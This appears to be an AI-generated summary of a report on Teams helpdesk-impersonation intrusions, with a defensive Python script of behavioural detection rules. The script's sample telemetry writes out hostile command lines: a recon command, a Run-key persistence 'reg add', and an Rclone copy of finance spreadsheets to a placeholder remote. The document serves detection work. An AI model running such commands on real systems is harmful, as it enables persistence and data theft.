Attackers weaponize external Teams chats to impersonate helpdesk and hijack endpoints
Original source: "Microsoft: Teams increasingly abused in helpdesk impersonation attacks" (BleepingComputer)

Microsoft is tracking a rise in intrusions that begin with cross-tenant Teams messages from actors posing as internal IT or helpdesk staff. The social engineering pitch is routine (an account issue, a pending security update), but the payoff is a Quick Assist remote session that hands the attacker direct control of the victim's workstation. From that foothold, the operators run reconnaissance through cmd and PowerShell, then drop a payload bundle into user-writable paths like ProgramData and execute it via DLL side-loading through signed binaries from vendors such as Autodesk and Adobe, so C2 traffic rides out over HTTPS alongside normal telemetry.
Lateral movement leans entirely on native tooling: WinRM to pivot to domain-joined hosts and domain controllers, Registry edits for persistence, and additional remote management agents planted on reachable systems. Exfiltration runs through Rclone to external cloud storage, with filters applied to pull only high-value data and keep transfer volumes low enough to blend into legitimate IT activity.
The chain is notable less for novelty than for how cleanly it collapses into the noise floor of a normal enterprise. Every stage — Teams, Quick Assist, signed-binary execution, WinRM, cloud sync — is a tool defenders already allow. Microsoft’s guidance (treat external Teams contacts as untrusted, constrain remote assistance tools, scope WinRM) is really an admission that the detection surface for this pattern lives in policy and behavioral analytics, not signatures.
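Because every stage of this chain uses tooling defenders already permit, the detection logic has to key on relationships between events (which parent spawned the shell, where a loaded DLL lives, which host a command arrived on over WinRM) rather than on file signatures. The script below is an added example written for this summary, not code from Microsoft or BleepingComputer: it runs five such behavioral rules over constructed, Sysmon-style process-create (EventID 1) and image-load (EventID 7) records flattened to JSON lines. The field names follow Sysmon, where `Signed`/`Signature` on EventID 7 describe the loaded DLL; the hostnames, user, paths, signer and command lines are placeholders, and the process names `QuickAssist.exe` (the Quick Assist client) and `wsmprovhost.exe` (the host process for commands run over WinRM) are the assumptions the rules rest on.

```python
"""Behavioral detections for the Teams / Quick Assist helpdesk-impersonation chain.

Added example: the events below are constructed, Sysmon-style records
(EventID 1 = process create, EventID 7 = image load) serialized as JSON lines.
"""
import json
import ntpath

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
REMOTE_ASSIST = {"quickassist.exe"}      # Quick Assist client process (assumption)
WINRM_SHELL_HOST = "wsmprovhost.exe"     # hosts commands executed over WinRM


def _base(path):
    """Lower-cased file name of a Windows path; ntpath works on any OS."""
    return ntpath.basename(path or "").lower()


def is_user_writable(path):
    """Roots an unprivileged user can drop files into (ProgramData, Public, AppData)."""
    p = (path or "").lower()
    return (p.startswith("c:\\programdata\\")
            or p.startswith("c:\\users\\public\\")
            or "\\appdata\\" in p)


def rule_remote_assist_shell(ev):
    # Recon shell launched from inside the remote-assistance session.
    return (ev.get("EventID") == 1
            and _base(ev.get("ParentImage")) in REMOTE_ASSIST
            and _base(ev.get("Image")) in SHELLS)


def rule_sideload_unsigned_dll(ev):
    # Binary living in a user-writable path loads an unsigned DLL from one too:
    # the side-loading pattern where the dropped bundle supplies its own DLL.
    return (ev.get("EventID") == 7
            and is_user_writable(ev.get("Image"))
            and is_user_writable(ev.get("ImageLoaded"))
            and str(ev.get("Signed", "")).lower() != "true")


def rule_winrm_remote_shell(ev):
    # A shell whose parent is the WinRM provider host ran remotely on this box.
    return (ev.get("EventID") == 1
            and _base(ev.get("ParentImage")) == WINRM_SHELL_HOST
            and _base(ev.get("Image")) in SHELLS)


def rule_run_key_persistence(ev):
    cl = (ev.get("CommandLine") or "").lower()
    return (ev.get("EventID") == 1 and _base(ev.get("Image")) == "reg.exe"
            and " add " in cl and "currentversion\\run" in cl)


def rule_rclone_transfer(ev):
    cl = (ev.get("CommandLine") or "").lower()
    return (ev.get("EventID") == 1
            and (_base(ev.get("Image")) == "rclone.exe" or "rclone" in cl)
            and any(verb in cl.split() for verb in ("copy", "sync", "move")))


RULES = [
    ("remote_assist_shell", rule_remote_assist_shell),
    ("sideload_unsigned_dll_user_writable", rule_sideload_unsigned_dll),
    ("winrm_remote_shell", rule_winrm_remote_shell),
    ("run_key_persistence", rule_run_key_persistence),
    ("rclone_transfer", rule_rclone_transfer),
]


def parse_events(text):
    """JSON-lines -> list of event dicts (blank lines ignored)."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect(events):
    """Return one alert dict per (event, rule) match, in event order."""
    alerts = []
    for ev in events:
        for name, matches in RULES:
            if matches(ev):
                alerts.append({"rule": name, "host": ev.get("Computer"),
                               "image": ev.get("Image"),
                               "detail": ev.get("CommandLine") or ev.get("ImageLoaded")})
    return alerts


# Constructed sample telemetry: the five malicious stages plus two benign events.
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "WS-017", "User": "CORP\\j.doe",
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Program Files\\WindowsApps\\QuickAssist\\QuickAssist.exe",
     "CommandLine": "cmd.exe /c whoami & systeminfo"},
    {"EventID": 7, "Computer": "WS-017",
     "Image": "C:\\ProgramData\\Updater\\vendor_signed.exe",
     "ImageLoaded": "C:\\ProgramData\\Updater\\helper.dll",
     "Signed": "false", "Signature": ""},
    {"EventID": 1, "Computer": "DC01", "User": "CORP\\j.doe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\System32\\wsmprovhost.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-ADComputer -Filter *"},
    {"EventID": 1, "Computer": "WS-017", "User": "CORP\\j.doe",
     "Image": "C:\\Windows\\System32\\reg.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
                    " /v Updater /d C:\\ProgramData\\Updater\\vendor_signed.exe"},
    {"EventID": 1, "Computer": "WS-017", "User": "CORP\\j.doe",
     "Image": "C:\\ProgramData\\Updater\\rclone.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "rclone.exe copy C:\\Finance remote:share --include *.xlsx"},
    {"EventID": 1, "Computer": "WS-017", "User": "CORP\\j.doe",
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "cmd.exe"},
    {"EventID": 7, "Computer": "WS-017",
     "Image": "C:\\Program Files\\Vendor\\app.exe",
     "ImageLoaded": "C:\\Windows\\System32\\kernel32.dll",
     "Signed": "true", "Signature": "Microsoft Windows"},
]
SAMPLE_LOG = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)

if __name__ == "__main__":
    for alert in detect(parse_events(SAMPLE_LOG)):
        print(f"{alert['rule']:38} {alert['host']:7} {alert['detail']}")
```

Run against the constructed log, the two benign events (a shell opened from Explorer, a `Program Files` binary loading `kernel32.dll`) produce nothing, while each of the five stages raises exactly one alert. In production the rules would be fed from a SIEM rather than a string, and the user-writable root list and the remote-assistance process set would be tuned to the estate; the `winrm_remote_shell` rule in particular is only useful once WinRM has been scoped to a known set of management hosts, so that a remote shell on a domain controller from anywhere else is an anomaly rather than routine administration.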
This is an AI-generated summary; read the original at BleepingComputer for the full story.